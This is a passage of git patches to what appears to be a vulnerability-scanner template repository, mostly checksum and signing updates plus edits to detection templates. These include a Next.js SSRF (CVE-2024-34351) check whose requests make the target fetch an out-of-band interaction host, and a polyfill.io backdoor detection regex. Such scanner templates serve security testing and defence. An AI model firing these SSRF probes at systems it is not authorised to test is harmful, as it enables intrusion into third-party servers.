-1,18 +1,32 @@ id: CVE-2024-34351 info: - name: Next.js - SSRF + name: Next.js - Server Side Request Forgery (SSRF) author: righettod severity: high - remediation: Upgrade to Next.js version 14.1.1 or higher. description: | Next.Js, inferior to version 14.1.1, have its image optimization built-in component prone to SSRF. + remediation: Upgrade to Next.js version 14.1.1 or higher. reference: - https://www.assetnote.io/resources/research/digging-for-ssrf-in-nextjs-apps - https://nvd.nist.gov/vuln/detail/CVE-2024-34351 - https://github.com/vercel/next.js/security/advisories/GHSA-fr5h-rqp8-mj6g + - https://github.com/vercel/next.js/commit/8f7a6ca7d21a97bc9f7a1bbe10427b5ad74b9085 + - https://github.com/vercel/next.js/pull/62561 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.5 + cve-id: CVE-2024-34351 + cwe-id: CWE-918 + epss-score: 0.00062 + epss-percentile: 0.26843 metadata: max-request: 2 + product: next.js + shodan-query: + - http.html:"/_next/static" + - cpe:"cpe:2.3:a:zeit:next.js" + fofa-query: body="/_next/static" tags: cve,cve2024,vercel,nextjs,ssrf http: @@ -21,8 +35,15 @@ http: - '{{BaseURL}}/_next/image?w=16&q=10&url=http://{{interactsh-url}}' - '{{BaseURL}}/_next/image?w=16&q=10&url=https://{{interactsh-url}}' + stop-at-first-match: true + matchers-condition: and matchers: - type: word part: interactsh_protocol words: - 'http' + + - type: word + part: body + words: + - "The requested resource isn't a valid image" From c35e112e5a9348421b6a24b072501d7dd0516925 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Mon, 15 Jul 2024 17:48:16 +0530 Subject: [PATCH 186/247] minor update --- http/exposures/configs/apache-ozone-conf.yaml | 7 +++++++ 1 file changed, 7 insertions(+) diff --git a/http/exposures/configs/apache-ozone-conf.yaml b/http/exposures/configs/apache-ozone-conf.yaml index 5c80a56ec36..1a0b836adf5 100644 --- a/http/exposures/configs/apache-ozone-conf.yaml +++ b/http/exposures/configs/apache-ozone-conf.yaml @@ -23,9 +23,16 @@ http: matchers-condition: and matchers: - type: word + part: body words: - 'ozone-default.xml' - 'ozone' + condition: and + + - type: word + part: content_type + words: + - 'text/xml' - type: status status: From c40acc75f8791b455f0c76729b608508f37d3af5 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Mon, 15 Jul 2024 17:51:27 +0530 Subject: [PATCH 187/247] Update apache-ozone-detect.yaml --- http/technologies/apache/apache-ozone-detect.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/http/technologies/apache/apache-ozone-detect.yaml b/http/technologies/apache/apache-ozone-detect.yaml index 2e7d2b908fc..07b6657aea4 100644 --- a/http/technologies/apache/apache-ozone-detect.yaml +++ b/http/technologies/apache/apache-ozone-detect.yaml @@ -5,7 +5,7 @@ info: author: icarot severity: info description: | - Detects a Apache Ozone web application, a scalable, redundant, and distributed object store for Hadoop and Cloud-native environments. + Detects a Apache Ozone web application, a scalable, redundant, and distributed object store for Hadoop and Cloud-native environments. classification: cpe: cpe:2.3:a:apache:ozone:-:*:*:*:*:*:*:* metadata: From 497b7996c7fd241192d89635f1df5e5fb0837f31 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Mon, 15 Jul 2024 17:56:18 +0530 Subject: [PATCH 188/247] author name update --- http/cves/2022/CVE-2022-35914.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/http/cves/2022/CVE-2022-35914.yaml b/http/cves/2022/CVE-2022-35914.yaml index bee81c08501..9fc868d35b8 100644 --- a/http/cves/2022/CVE-2022-35914.yaml +++ b/http/cves/2022/CVE-2022-35914.yaml @@ -2,7 +2,7 @@ id: CVE-2022-35914 info: name: GLPI <=10.0.2 - Remote Command Execution - author: For3stCo1d + sender (github.com/allendemoura) + author: For3stCo1d,allendemoura severity: critical description: | GLPI through 10.0.2 is susceptible to remote command execution injection in /vendor/htmlawed/htmlawed/htmLawedTest.php in the htmlawed module. From 83a19e1becd14b022fe8866e0592e544d03cfc78 Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Mon, 15 Jul 2024 12:36:50 +0000 Subject: [PATCH 189/247] Auto Generated New Template Addition List [Mon Jul 15 12:36:50 UTC 2024] :robot: --- .new-additions | 2 ++ 1 file changed, 2 insertions(+) diff --git a/.new-additions b/.new-additions index 922d7f8f5cf..ddcbc0606a9 100644 --- a/.new-additions +++ b/.new-additions @@ -10,7 +10,9 @@ http/cves/2024/CVE-2024-3742.yaml http/cves/2024/CVE-2024-4879.yaml http/cves/2024/CVE-2024-5217.yaml http/exposed-panels/gradle/gradle-develocity-panel.yaml +http/exposures/configs/apache-ozone-conf.yaml http/exposures/configs/snoop-servlet-exposure.yaml http/misconfiguration/servicenow-title-injection.yaml +http/technologies/apache/apache-ozone-detect.yaml http/vulnerabilities/nextjs/nextjs-middleware-cache.yaml http/vulnerabilities/nextjs/nextjs-rsc-cache.yaml From 9d8c25b6d7daf17c162ba3652b583da7504b3182 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Mon, 15 Jul 2024 12:36:55 +0000 Subject: [PATCH 190/247] Auto Generated Templates Checksum [Mon Jul 15 12:36:55 UTC 2024] :robot: --- templates-checksum.txt | 10 ++++++---- 1 file changed, 6 insertions(+), 4 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index edb768bc9c9..15353e62b20 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -223,8 +223,8 @@ code/privilege-escalation/linux/rw-sudoers.yaml:f974b1d1a68fd7a8cd24b6f1b61855dd code/privilege-escalation/linux/sudo-nopasswd.yaml:3117c141f35b9229b6ebe1db10a4fef77aa6ee17 code/privilege-escalation/linux/writable-etc-passwd.yaml:c0ad4796f42aab9c901b52b52b91940172d070e9 contributors.json:951e2ab8bbae42da01f52da9ef0a14ce7f17e159 -cves.json:54289a82cf1c037dd6448d8f9eeb1bf730e677c6 -cves.json-checksum.txt:d5f06463ea1caf086fbccbaca48d49d83876faf8 +cves.json:4c2a84b412e8ffa5b7a00e4e63db995d52456256 +cves.json-checksum.txt:8d61f38e96d89a3923979efdff942cf8c7b56fc0 dast/cves/2018/CVE-2018-19518.yaml:3407e99af553fe5bdb0ffc001a4132e169c55730 dast/cves/2021/CVE-2021-45046.yaml:a52633e88957969fb09969be45c0a8606ee3d752 dast/cves/2022/CVE-2022-34265.yaml:e006df0567f928e43d40050f55d5928a3fbff17e @@ -3293,7 +3293,7 @@ http/cves/2023/CVE-2023-44012.yaml:bbecae0c3583a4572602e3fc0c8619bafeb77bad http/cves/2023/CVE-2023-4415.yaml:17cc5b909d851380cf62dcece5db812a7e1ea68a http/cves/2023/CVE-2023-44352.yaml:aab520d12d287288efc9c45a67a0e196a444ff93 http/cves/2023/CVE-2023-44353.yaml:147dd7796888db15383a9db3b463b1c564bde8cf -http/cves/2023/CVE-2023-4450.yaml:44a7cf49f0f3248d174146ef6363d5d280737948 +http/cves/2023/CVE-2023-4450.yaml:c0f6a278a989a4e11d99a1543fad5c999232eec8 http/cves/2023/CVE-2023-4451.yaml:d5e665511b95b75eea8988c75f5427b4616e80c9 http/cves/2023/CVE-2023-44812.yaml:11e5628cb888352e0dcd50839df33dc85fb2b58c http/cves/2023/CVE-2023-44813.yaml:ba83815830ad498e3a1e78649d1ddc4a48612025 @@ -4846,6 +4846,7 @@ http/exposures/configs/alibaba-canal-info-leak.yaml:9a0d928feb9c023e106d2e5fb6d4 http/exposures/configs/amazon-docker-config.yaml:1d8f327855f92a3e31436e4ba787bf72c1593362 http/exposures/configs/ansible-config-disclosure.yaml:49727934f2ea10682033bb7b7d2886c8120e599c http/exposures/configs/apache-config.yaml:f44a3a1e85855c7d7e0a98987e169b4d8c9953de +http/exposures/configs/apache-ozone-conf.yaml:93a18844e6db3976029026e9eba28b8735b8da0d http/exposures/configs/apache-pinot-config.yaml:5e48b64394394c62759e9a054ed422c5a891c50a http/exposures/configs/appspec-yml-disclosure.yaml:6bc7aaae85de1d64d2ad28ca4474205b6cba4a1a http/exposures/configs/appveyor-configuration-file.yaml:20b64eb403f080bf2a11eaf98f3010f97a7ddd39 @@ -6898,6 +6899,7 @@ http/technologies/apache/apache-detect.yaml:1ec0c234a8a4487c59726af437b6eaa1fa24 http/technologies/apache/apache-dubbo-detect.yaml:454eb1d29924d2b5f4a9f6765d3062646950f91a http/technologies/apache/apache-guacamole.yaml:8c7975c569769ee074f51307e0d963b816e631aa http/technologies/apache/apache-karaf-panel.yaml:50fa0b20105a0786c5ce5ddce7aa5c49237bfafa +http/technologies/apache/apache-ozone-detect.yaml:2bae35e190d1e6e7c6ae74b4b4e3f247bb08e562 http/technologies/apache/apache-pinot-detect.yaml:d87ea1adf8a744e4bea49ca48778d43572019d8d http/technologies/apache/apache-tapestry-detect.yaml:e909341eeb3f54c209d395e2d5277b754985d70c http/technologies/apache/apache-zeppelin-detect.yaml:2be8f1552e97541d05b1a9ed6d9fda8b2d9df37d @@ -8879,7 +8881,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:6541ef1d68f6051c35d1edb80eeeed45cc1bfdc0 +templates-checksum.txt:da9b1a3c014a2e59abc022fc2f8c7e189fb4ef51 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From c7baa6b2c5a1f400c68ff50754d0f36c5e6e81a9 Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Mon, 15 Jul 2024 12:37:50 +0000 Subject: [PATCH 191/247] Syncing Templates --- .github/workflows/templates-sync.yml | 2 ++ 1 file changed, 2 insertions(+) diff --git a/.github/workflows/templates-sync.yml b/.github/workflows/templates-sync.yml index 3b1b1400d80..cf759d56383 100644 --- a/.github/workflows/templates-sync.yml +++ b/.github/workflows/templates-sync.yml @@ -15,8 +15,10 @@ on: - 'http/cves/2024/CVE-2024-4879.yaml' - 'http/cves/2024/CVE-2024-5217.yaml' - 'http/exposed-panels/gradle/gradle-develocity-panel.yaml' + - 'http/exposures/configs/apache-ozone-conf.yaml' - 'http/exposures/configs/snoop-servlet-exposure.yaml' - 'http/misconfiguration/servicenow-title-injection.yaml' + - 'http/technologies/apache/apache-ozone-detect.yaml' - 'http/vulnerabilities/nextjs/nextjs-middleware-cache.yaml' - 'http/vulnerabilities/nextjs/nextjs-rsc-cache.yaml' workflow_dispatch: From bf44a3730526128a57a841caaaabedec5d0edbfe Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Mon, 15 Jul 2024 12:37:58 +0000 Subject: [PATCH 192/247] Auto Generated New Template Addition List [Mon Jul 15 12:37:57 UTC 2024] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index ddcbc0606a9..1de228ee1ac 100644 --- a/.new-additions +++ b/.new-additions @@ -9,6 +9,7 @@ http/cves/2024/CVE-2024-2330.yaml http/cves/2024/CVE-2024-3742.yaml http/cves/2024/CVE-2024-4879.yaml http/cves/2024/CVE-2024-5217.yaml +http/exposed-panels/falcosidekick-panel.yaml http/exposed-panels/gradle/gradle-develocity-panel.yaml http/exposures/configs/apache-ozone-conf.yaml http/exposures/configs/snoop-servlet-exposure.yaml From 10f817c460e7cb9d7727976b934f70ce7a196ee6 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Mon, 15 Jul 2024 12:38:09 +0000 Subject: [PATCH 193/247] Auto Generated Templates Checksum [Mon Jul 15 12:38:09 UTC 2024] :robot: --- templates-checksum.txt | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 15353e62b20..84e5f55ef3f 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -4023,6 +4023,7 @@ http/exposed-panels/extron-cms-panel.yaml:adbdc23be4107dc614acb0ef6ea20aba3796be http/exposed-panels/ez-publish-panel.yaml:5dc8fa80dca1479e568d4b1cf87563755471e0a0 http/exposed-panels/f-secure-policy-manager.yaml:e759ce79b7869284f9cddab81bfa0da26d08099b http/exposed-panels/f5-admin-interface.yaml:06ce0e9fbf3ed64d2e550abccd8fa1ba7cea60a4 +http/exposed-panels/falcosidekick-panel.yaml:0bd17de7df4e475e056b9df0d7a209cffe9ca240 http/exposed-panels/faraday-login.yaml:c3b48df43eb116d0c1e264a181ca095685ef0e0b http/exposed-panels/fastapi-docs.yaml:74f9efd92e158f5b36c17eb1e45668c5fb0dafee http/exposed-panels/fastpanel-hosting-control-panel.yaml:302d3b1d9cb607ffebc9746556ba3af14fb57e0e @@ -8881,7 +8882,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:da9b1a3c014a2e59abc022fc2f8c7e189fb4ef51 +templates-checksum.txt:fc90fb832b47142377c43a1e88ce4aeb61f64497 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From 82f1fb6bc1ec129c60e08ebe33d0c26e672fbf7b Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Mon, 15 Jul 2024 12:38:37 +0000 Subject: [PATCH 194/247] Auto Template Signing [Mon Jul 15 12:38:37 UTC 2024] :robot: --- http/exposures/configs/apache-ozone-conf.yaml | 1 + http/technologies/apache/apache-ozone-detect.yaml | 1 + 2 files changed, 2 insertions(+) diff --git a/http/exposures/configs/apache-ozone-conf.yaml b/http/exposures/configs/apache-ozone-conf.yaml index 1a0b836adf5..8d14ec3f5bd 100644 --- a/http/exposures/configs/apache-ozone-conf.yaml +++ b/http/exposures/configs/apache-ozone-conf.yaml @@ -37,3 +37,4 @@ http: - type: status status: - 200 +# digest: 4b0a00483046022100e0aab20fe9079676fe1b51de2881fde4c85afb9eff230594c734cc2fe9289f25022100efd1afa9a5fa2c2185f9678274dbcf357bf2e7a82c58fef68c6ca4fba5177ff3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/apache/apache-ozone-detect.yaml b/http/technologies/apache/apache-ozone-detect.yaml index 07b6657aea4..ccc40bf7b03 100644 --- a/http/technologies/apache/apache-ozone-detect.yaml +++ b/http/technologies/apache/apache-ozone-detect.yaml @@ -29,3 +29,4 @@ http: - type: status status: - 200 +# digest: 4a0a00473045022100a6fe873ee57b8f63b334e49cd72d7436f67ad4810e45bde91a46d62aabe83f6302203f1b7a1cec48d89ac746c7ca36e19dac04886d6b022eebdc64d4848455bb89ea:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From 27c8b39934c623386e231e2f53d91f6472d0ec29 Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Mon, 15 Jul 2024 12:38:46 +0000 Subject: [PATCH 195/247] Syncing Templates --- .github/workflows/templates-sync.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/.github/workflows/templates-sync.yml b/.github/workflows/templates-sync.yml index cf759d56383..ff6f26f13c0 100644 --- a/.github/workflows/templates-sync.yml +++ b/.github/workflows/templates-sync.yml @@ -14,6 +14,7 @@ on: - 'http/cves/2024/CVE-2024-3742.yaml' - 'http/cves/2024/CVE-2024-4879.yaml' - 'http/cves/2024/CVE-2024-5217.yaml' + - 'http/exposed-panels/falcosidekick-panel.yaml' - 'http/exposed-panels/gradle/gradle-develocity-panel.yaml' - 'http/exposures/configs/apache-ozone-conf.yaml' - 'http/exposures/configs/snoop-servlet-exposure.yaml' From d7bbdd6ad441e9ed62e3deb84c25b6f04d0ca91d Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Mon, 15 Jul 2024 13:14:56 +0000 Subject: [PATCH 196/247] Auto Generated New Template Addition List [Mon Jul 15 13:14:56 UTC 2024] :robot: From 9a675a2e9c6ad2d2090aa3e1679f5149e93dacba Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Mon, 15 Jul 2024 13:15:01 +0000 Subject: [PATCH 197/247] Auto Generated Templates Checksum [Mon Jul 15 13:15:01 UTC 2024] :robot: --- templates-checksum.txt | 8 ++++---- 1 file changed, 4 insertions(+), 4 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 84e5f55ef3f..2231f4fa9db 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -2850,7 +2850,7 @@ http/cves/2022/CVE-2022-35416.yaml:ba270b48da401279206d5f902bbe73ca36541510 http/cves/2022/CVE-2022-35493.yaml:1a510b745d56a950c268cf2e0c6a7641e8567b88 http/cves/2022/CVE-2022-35653.yaml:471e71af52b2016a93691b1d0dac298788f1d6d8 http/cves/2022/CVE-2022-3578.yaml:cf4906cde10fe488bbdf473de15bb5d018745939 -http/cves/2022/CVE-2022-35914.yaml:cb20ef72dc328bf515f5049968cc334103451d7e +http/cves/2022/CVE-2022-35914.yaml:3d2c3f760cf05873f8660ca11b5d02c224b939c1 http/cves/2022/CVE-2022-36446.yaml:353c3190a3f8d375c693051d20fc2160e9aaa9a9 http/cves/2022/CVE-2022-36537.yaml:80c128feeca028db35b08e0548acc4895ccd2814 http/cves/2022/CVE-2022-36553.yaml:869cc6bd636251787da80b5eaef2cb69f0934607 @@ -4847,7 +4847,7 @@ http/exposures/configs/alibaba-canal-info-leak.yaml:9a0d928feb9c023e106d2e5fb6d4 http/exposures/configs/amazon-docker-config.yaml:1d8f327855f92a3e31436e4ba787bf72c1593362 http/exposures/configs/ansible-config-disclosure.yaml:49727934f2ea10682033bb7b7d2886c8120e599c http/exposures/configs/apache-config.yaml:f44a3a1e85855c7d7e0a98987e169b4d8c9953de -http/exposures/configs/apache-ozone-conf.yaml:93a18844e6db3976029026e9eba28b8735b8da0d +http/exposures/configs/apache-ozone-conf.yaml:d4268ae66e2ca96c4bf2e0b0738128f0c7673e1b http/exposures/configs/apache-pinot-config.yaml:5e48b64394394c62759e9a054ed422c5a891c50a http/exposures/configs/appspec-yml-disclosure.yaml:6bc7aaae85de1d64d2ad28ca4474205b6cba4a1a http/exposures/configs/appveyor-configuration-file.yaml:20b64eb403f080bf2a11eaf98f3010f97a7ddd39 @@ -6900,7 +6900,7 @@ http/technologies/apache/apache-detect.yaml:1ec0c234a8a4487c59726af437b6eaa1fa24 http/technologies/apache/apache-dubbo-detect.yaml:454eb1d29924d2b5f4a9f6765d3062646950f91a http/technologies/apache/apache-guacamole.yaml:8c7975c569769ee074f51307e0d963b816e631aa http/technologies/apache/apache-karaf-panel.yaml:50fa0b20105a0786c5ce5ddce7aa5c49237bfafa -http/technologies/apache/apache-ozone-detect.yaml:2bae35e190d1e6e7c6ae74b4b4e3f247bb08e562 +http/technologies/apache/apache-ozone-detect.yaml:a06d145bb51dd1d87c14bc151843fdf8c5ef7285 http/technologies/apache/apache-pinot-detect.yaml:d87ea1adf8a744e4bea49ca48778d43572019d8d http/technologies/apache/apache-tapestry-detect.yaml:e909341eeb3f54c209d395e2d5277b754985d70c http/technologies/apache/apache-zeppelin-detect.yaml:2be8f1552e97541d05b1a9ed6d9fda8b2d9df37d @@ -8882,7 +8882,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:fc90fb832b47142377c43a1e88ce4aeb61f64497 +templates-checksum.txt:c138e1dec2e8d0ab849320b8788d5c614d9c8fea wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From 0a457c6b26ab072b0a755a8f4a0a408836de1eaf Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Mon, 15 Jul 2024 13:16:41 +0000 Subject: [PATCH 198/247] Auto Template Signing [Mon Jul 15 13:16:41 UTC 2024] :robot: --- http/cves/2022/CVE-2022-35914.yaml | 2 +- http/exposed-panels/falcosidekick-panel.yaml | 3 ++- 2 files changed, 3 insertions(+), 2 deletions(-) diff --git a/http/cves/2022/CVE-2022-35914.yaml b/http/cves/2022/CVE-2022-35914.yaml index 9fc868d35b8..698c9ff15a8 100644 --- a/http/cves/2022/CVE-2022-35914.yaml +++ b/http/cves/2022/CVE-2022-35914.yaml @@ -80,4 +80,4 @@ http: - type: status status: - 200 -# digest: 490a00463044022031f4721d255682854c1f6e4bd4388e92d46d517fab31f98380587eb1a48affb80220778ad6d9444db683bd4d83ff14f1b4c8bdd98b8a158995518fb94c3fe5cc4a19:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022071715e230c583dcc77ca7b19e5fe7b16b827b336f1ff76ac3a7e67766d9a3cea022100e481d4bbf96495298f9fe22ab286175a30b4846146983dd92c95e4a51916d702:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/falcosidekick-panel.yaml b/http/exposed-panels/falcosidekick-panel.yaml index a0115c36a44..6daeead72e6 100644 --- a/http/exposed-panels/falcosidekick-panel.yaml +++ b/http/exposed-panels/falcosidekick-panel.yaml @@ -23,4 +23,5 @@ http: dsl: - 'status_code == 200' - 'contains_any(to_lower(body), "falcosidekick ui", "falcosidekick-ui")' - condition: and \ No newline at end of file + condition: and +# digest: 4a0a00473045022100af97afecd9beaaa9c8b9b94b03bbfe590b0f81e728159ee1cdcdc4de34407b3302201dce0e4b75ceadf27a96601a8810c53b19e22f75c76a4ea23bd962cbc3c6e204:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From e58e3da32870e597e15f327bad8c4f03ca410e12 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Mon, 15 Jul 2024 18:48:30 +0530 Subject: [PATCH 199/247] minor update --- http/vulnerabilities/backdoor/polyfill-backdoor.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/http/vulnerabilities/backdoor/polyfill-backdoor.yaml b/http/vulnerabilities/backdoor/polyfill-backdoor.yaml index e65efaee935..e0879d94203 100644 --- a/http/vulnerabilities/backdoor/polyfill-backdoor.yaml +++ b/http/vulnerabilities/backdoor/polyfill-backdoor.yaml @@ -1,7 +1,7 @@ id: polyfill-backdoor info: - name: Polyfill.io - Detection + name: Polyfill.io - Backdoor author: kazet severity: high description: | @@ -30,4 +30,4 @@ http: part: body regex: - "]* src=['\"]https?://([a-zA-Z0-9-]*.)?polyfill.io[/'\"]" -# digest: 4a0a0047304502202741c6e8841c555d7c41536c7eccafe5207519fdbe69a21a76d09728e190bc5d022100ac5f13bcb311fa2091c545e60acfa5a45f6b000cdf5e4fd5a46f76d0632f4575:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502202741c6e8841c555d7c41536c7eccafe5207519fdbe69a21a76d09728e190bc5d022100ac5f13bcb311fa2091c545e60acfa5a45f6b000cdf5e4fd5a46f76d0632f4575:922c64590222798bb761d5b6d8e72950 From 880aeac769a8714607a1736d5ce313ea9c09e2ba Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Mon, 15 Jul 2024 15:09:24 +0000 Subject: [PATCH 200/247] Auto Generated New Template Addition List [Mon Jul 15 15:09:24 UTC 2024] :robot: From 647732cbdffcff3ec5abc3d759edd70bf7b95250 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Mon, 15 Jul 2024 15:09:28 +0000 Subject: [PATCH 201/247] Auto Generated Templates Checksum [Mon Jul 15 15:09:28 UTC 2024] :robot: --- templates-checksum.txt | 8 ++++---- 1 file changed, 4 insertions(+), 4 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 2231f4fa9db..9619570a417 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -2850,7 +2850,7 @@ http/cves/2022/CVE-2022-35416.yaml:ba270b48da401279206d5f902bbe73ca36541510 http/cves/2022/CVE-2022-35493.yaml:1a510b745d56a950c268cf2e0c6a7641e8567b88 http/cves/2022/CVE-2022-35653.yaml:471e71af52b2016a93691b1d0dac298788f1d6d8 http/cves/2022/CVE-2022-3578.yaml:cf4906cde10fe488bbdf473de15bb5d018745939 -http/cves/2022/CVE-2022-35914.yaml:3d2c3f760cf05873f8660ca11b5d02c224b939c1 +http/cves/2022/CVE-2022-35914.yaml:e6f5016c74cfafc6587ded1139797561a97d8d4f http/cves/2022/CVE-2022-36446.yaml:353c3190a3f8d375c693051d20fc2160e9aaa9a9 http/cves/2022/CVE-2022-36537.yaml:80c128feeca028db35b08e0548acc4895ccd2814 http/cves/2022/CVE-2022-36553.yaml:869cc6bd636251787da80b5eaef2cb69f0934607 @@ -4023,7 +4023,7 @@ http/exposed-panels/extron-cms-panel.yaml:adbdc23be4107dc614acb0ef6ea20aba3796be http/exposed-panels/ez-publish-panel.yaml:5dc8fa80dca1479e568d4b1cf87563755471e0a0 http/exposed-panels/f-secure-policy-manager.yaml:e759ce79b7869284f9cddab81bfa0da26d08099b http/exposed-panels/f5-admin-interface.yaml:06ce0e9fbf3ed64d2e550abccd8fa1ba7cea60a4 -http/exposed-panels/falcosidekick-panel.yaml:0bd17de7df4e475e056b9df0d7a209cffe9ca240 +http/exposed-panels/falcosidekick-panel.yaml:cefd542269e92b8ee42dffece2d74a668f63ead8 http/exposed-panels/faraday-login.yaml:c3b48df43eb116d0c1e264a181ca095685ef0e0b http/exposed-panels/fastapi-docs.yaml:74f9efd92e158f5b36c17eb1e45668c5fb0dafee http/exposed-panels/fastpanel-hosting-control-panel.yaml:302d3b1d9cb607ffebc9746556ba3af14fb57e0e @@ -7795,7 +7795,7 @@ http/vulnerabilities/backdoor/kevinlab-bems-backdoor.yaml:40fe980d103f1d5051cba7 http/vulnerabilities/backdoor/kevinlab-hems-backdoor.yaml:dbdc2b6a43a93f2c3fa9693bcebc4603d9259cf7 http/vulnerabilities/backdoor/maccmsv10-backdoor.yaml:e763381e735041df29338e57c20d2f6c1f90cec3 http/vulnerabilities/backdoor/php-zerodium-backdoor-rce.yaml:afb4e7906517f78be25199884095f7d6eff8ac70 -http/vulnerabilities/backdoor/polyfill-backdoor.yaml:ef5b84434c7d83f9cc3e197c42f1c51b191faf8f +http/vulnerabilities/backdoor/polyfill-backdoor.yaml:12ec4ad8b5b872056c773edf10c4e167977b7f6b http/vulnerabilities/bsphp-info.yaml:46e581c10e555d13d42b306e5ba11288df471949 http/vulnerabilities/chanjet-tplus/chanjet-tplus-rce.yaml:47bcfad01469360b596efc0ee445ea1da8b7ae9e http/vulnerabilities/chanjet-tplus/chanjet-tplus-unauth-passreset.yaml:76ea49402465f15c655f2e5c13c29f6eb50e8849 @@ -8882,7 +8882,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:c138e1dec2e8d0ab849320b8788d5c614d9c8fea +templates-checksum.txt:9923fa649026efc80e5922e143d578e3bbea683f wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From 954c8665e15cfc484f6ebe582ab5a7842ad90a2d Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Mon, 15 Jul 2024 15:11:10 +0000 Subject: [PATCH 202/247] Auto Template Signing [Mon Jul 15 15:11:10 UTC 2024] :robot: --- http/vulnerabilities/backdoor/polyfill-backdoor.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/http/vulnerabilities/backdoor/polyfill-backdoor.yaml b/http/vulnerabilities/backdoor/polyfill-backdoor.yaml index e0879d94203..d0c127ca2cd 100644 --- a/http/vulnerabilities/backdoor/polyfill-backdoor.yaml +++ b/http/vulnerabilities/backdoor/polyfill-backdoor.yaml @@ -30,4 +30,4 @@ http: part: body regex: - "]* src=['\"]https?://([a-zA-Z0-9-]*.)?polyfill.io[/'\"]" -# digest: 4a0a0047304502202741c6e8841c555d7c41536c7eccafe5207519fdbe69a21a76d09728e190bc5d022100ac5f13bcb311fa2091c545e60acfa5a45f6b000cdf5e4fd5a46f76d0632f4575:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a0047304502203f42ee7cd83f09782d81dcd502e2ed01add4d201cceb9baf65a2a240203f8046022100a05c40d55db5434ccc8fb01d0df8479216dc0191ebf471f93bcfb3d7adff0309:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From 